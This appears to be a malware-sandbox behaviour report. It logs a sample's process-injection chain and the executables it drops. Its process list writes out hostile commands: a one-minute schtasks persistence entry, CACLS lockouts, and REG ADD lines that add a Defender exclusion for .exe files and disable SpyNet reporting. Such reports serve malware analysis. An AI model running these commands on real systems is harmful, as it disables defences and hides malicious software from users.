Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
(62 further matches; no description, indicator, process or target recorded)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
(11 further SeShutdownPrivilege / SeCreatePagefilePrivilege pairs; no process recorded)

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
(24 further identical matches, all from msedge.exe)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
(23 further identical matches, all from msedge.exe)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3692 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3340 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe
PID 3340 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe
PID 3340 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe
PID 3340 wrote to memory of 2360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3034.exe
PID 3340 wrote to memory of 2360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3034.exe
PID 3340 wrote to memory of 2360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3034.exe
PID 3044 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 3044 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 3044 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2760 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2760 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2760 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 3340 wrote to memory of 2496 N/A N/A C:\Windows\system32\cmd.exe
PID 3340 wrote to memory of 2496 N/A N/A C:\Windows\system32\cmd.exe
PID 496 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 496 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 496 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 3340 wrote to memory of 3908 N/A N/A C:\Users\Admin\AppData\Local\Temp\3268.exe
PID 3340 wrote to memory of 3908 N/A N/A C:\Users\Admin\AppData\Local\Temp\3268.exe
PID 3340 wrote to memory of 3908 N/A N/A C:\Users\Admin\AppData\Local\Temp\3268.exe
PID 1120 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 1120 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 1120 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 3340 wrote to memory of 2308 N/A N/A C:\Users\Admin\AppData\Local\Temp\3334.exe
PID 3340 wrote to memory of 2308 N/A N/A C:\Users\Admin\AppData\Local\Temp\3334.exe
PID 3340 wrote to memory of 2308 N/A N/A C:\Users\Admin\AppData\Local\Temp\3334.exe
PID 1072 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe
PID 1072 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe
PID 1072 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe
PID 3340 wrote to memory of 2412 N/A N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe
PID 3340 wrote to memory of 2412 N/A N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe
PID 3340 wrote to memory of 2412 N/A N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe
PID 2496 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2496 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2496 wrote to memory of 1396 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2496 wrote to memory of 1396 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 456 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 456 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1396 wrote to memory of 3936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1396 wrote to memory of 3936 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2412 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2412 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2412 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\34AC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3524 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3524 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3524 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3524 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3524 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3524 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2364 wrote to memory of 4660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe

"C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\2EEB.exe

C:\Users\Admin\AppData\Local\Temp\2EEB.exe

C:\Users\Admin\AppData\Local\Temp\3034.exe

C:\Users\Admin\AppData\Local\Temp\3034.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\31AC.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

C:\Users\Admin\AppData\Local\Temp\3268.exe

C:\Users\Admin\AppData\Local\Temp\3268.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

C:\Users\Admin\AppData\Local\Temp\3334.exe

C:\Users\Admin\AppData\Local\Temp\3334.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

C:\Users\Admin\AppData\Local\Temp\34AC.exe

C:\Users\Admin\AppData\Local\Temp\34AC.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9698e46f8,0x7ff9698e4708,0x7ff9698e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9698e46f8,0x7ff9698e4708,0x7ff9698e4718

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,13907870991774904073,10320258948940097907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,13907870991774904073,10320258948940097907,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3896 -ip 3896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 540

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,6626056215657578088,8438631004549572965,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\B19E.exe

C:\Users\Admin\AppData\Local\Temp\B19E.exe

C:\Users\Admin\AppData\Local\Temp\B42F.exe

C:\Users\Admin\AppData\Local\Temp\B42F.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\C43D.exe

C:\Users\Admin\AppData\Local\Temp\C43D.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C2.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC714.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5868 -ip 5868

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 784

C:\Users\Admin\AppData\Local\Temp\is-2IB49.tmp\is-IN51T.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2IB49.tmp\is-IN51T.tmp" /SL4 $4023E "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Users\Admin\AppData\Local\Temp\F14A.exe

C:\Users\Admin\AppData\Local\Temp\F14A.exe

C:\Windows\SysWOW64\schtasks.exe

